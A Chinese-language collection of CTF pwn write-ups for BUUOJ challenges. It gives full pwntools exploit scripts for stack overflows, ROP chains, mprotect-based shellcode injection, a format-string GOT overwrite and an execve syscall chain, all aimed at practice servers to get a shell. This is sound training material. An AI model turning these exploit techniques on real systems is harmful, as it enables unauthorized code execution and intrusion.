目录
jarvisoj_level0
最基本的栈溢出题目,修改返回地址到callsystem
from pwn import *
r = remote("node3.buuoj.cn", 25406)
system = 0x400596
payload = 'a' * 0x88 + p64(system)
r.sendline(payload)
r.interactive()
jarvisoj_level2
比上一题略复杂,需要ROP,程序中给了system和/bin/sh
from pwn import *
r = remote("node3.buuoj.cn", 27747)
elf = ELF("./jarvisoj_level2")
system = elf.plt['system']
bin_sh = 0x0804A024
payload = 'a' * 0x8c + p32(system) + p32(bin_sh) * 2
r.sendline(payload)
r.interactive()
[HarekazeCTF2019]baby_rop
和上一题一样入门级ROP,需要注意的是flag在/home/babyrop下
from pwn import *
r = remote("node3.buuoj.cn", 27042)
elf = ELF("./babyrop")
system = elf.plt['system']
bin_sh = 0x601048
pop_rdi = 0x400683
print r.recv()
payload = 'a' * 0x18 + p64(pop_rdi) + p64(bin_sh) + p64(system)
r.sendline(payload)
r.interactive()
get_started_3dsctf_2016
开了NX,不过这题可以使用mprotect将bss段修改为可读可写可执行,然后调用read向bss段写入shellcode就能获得shell
函数原型
int mprotect(const void *start, size_t len, int prot);
start为起始地址
size为大小
prot为模式,7为可读可写可执行
还有一点就是,gets遇到0x0a(\n)会结束,遇到\x00不会,scanf也是
Exp如下:
from pwn import *
r = remote("node3.buuoj.cn", 25570)
context(arch = 'i386', os = 'linux')
elf = ELF("./get_started_3dsctf_2016")
bss = 0x080EBF81
pop3 = 0x0804951D
ret = 0x08048A40
mprotect = elf.symbols['mprotect']
read = elf.symbols['read']
payload = 'a' * 0x38 + p32(mprotect) + p32(pop3) + p32(0x080EB000) + p32(0x1000) + p32(0x7)
payload += p32(read) + p32(pop3) + p32(0) + p32(bss) + p32(0x100) + p32(bss)
r.sendline(payload)
payload = asm(shellcraft.sh())
r.sendline(payload)
r.interactive()
[第五空间2019 决赛]PWN5
查看栈
main函数返回地址
main函数返回地址位于(0x208-0x1e4)/4+1=10
因为格式化字符串攻击可以进行任意内存写,我们考虑吧atoi的GOT表改为system的plt表,并在密码处输入/bin/sh
Exp如下:
from pwn import *
r = remote("node3.buuoj.cn", 28487)
#r = process("./PWN5")
elf = ELF("./PWN5")
system_plt = elf.plt['system']
atoi = elf.got['atoi']
print hex(atoi)
print hex(system_plt)
num1 = (system_plt >> 16) & 0xFFFF
num1 -= 8
print hex(num1)
payload = p32(atoi+2) + p32(atoi) + '%' + str(num1) + 'c%10$hn'
num2 = (system_plt & 0xFFFF) - num1 - 8
print hex(num2)
payload += '%' + str(num2) + 'c%11$hn'
print r.recvuntil("your name:")
r.sendline(payload)
print r.recvuntil("your passwd:")
r.sendline('/bin/sh')
r.interactive()
ciscn_2019_n_8
送分题,把var变量的var[13]和var[14]用p64(17)覆盖即可
from pwn import *
r = remote("node3.buuoj.cn", 27127)
print r.recvuntil("\n")
payload = 'a' * 52 + p64(17)
r.sendline(payload)
r.interactive()
not_the_same_3dsctf_2016
这题和前面的 get_started思路一样,Exp如下
from pwn import *
r = remote("node3.buuoj.cn", 26271)
#r = process("./not_the_same_3dsctf_2016")
context(arch = 'i386', os = 'linux')
elf = ELF("./not_the_same_3dsctf_2016")
pop3 = 0x08050b45
bss = 0x080ECA2D
mem = 0x080EB000
mprotect = elf.symbols['mprotect']
read = elf.symbols['read']
payload = 'a' * 0x2D + p32(mprotect) + p32(pop3) + p32(mem) + p32(0x100) + p32(0x7)
payload += p32(read) + p32(pop3) + p32(0) + p32(mem) + p32(0x100) + p32(mem)
r.sendline(payload)
payload = asm(shellcraft.sh())
r.sendline(payload)
r.interactive()
ciscn_2019_s_3
这题需要使用syscall来获取shell
在64位系统中execve的系统调用各个寄存器值如下
rax:0x3B
rdi:addr of sh
rsi:0
rdx:0
本题中,利用write的信息泄露我们是可以获取栈上的地址的,该地址减去0x120即为/bin/sh的地址
并且题目也为我们提供了修改rax的gadget
把rdx修改为0则稍微困难些,需要利用以下的gadget
先把r13置为0,然后把r13赋值给rdx
Exp如下:
from pwn import *
r = remote("node3.buuoj.cn", 28104)
#r = process("./ciscn_s_3")
elf = ELF("./ciscn_s_3")
ret = 0x400519
bss = 0x601030
rax_3b = 0x4004e2
syscall = 0x400501
pop_rdi = 0x4005a3
pop_rsi_r15 = 0x4005a1
pop_rbx_rbp_r12_r13_r14_r15 = 0x40059A
mov_rdxr13_call = 0x0400580
main = 0x400531 #0x0004004ED
payload = '/bin/sh\x00' * 2 + p64(main)
r.sendline(payload)
print r.recv(0x20)
bin_sh = u64(r.recv(8)) - 0x120
print "sh:", hex(bin_sh)
payload = '/bin/sh\x00' * 2 + p64(pop_rbx_rbp_r12_r13_r14_r15) + p64(0) * 2 + p64(bin_sh + 0x50) + p64(0) * 3
payload += p64(mov_rdxr13_call)
payload += p64(pop_rdi) + p64(bin_sh) + p64(pop_rsi_r15) + p64(0) * 2 + p64(rax_3b) + p64(syscall)
r.sendline(payload)
r.interactive()
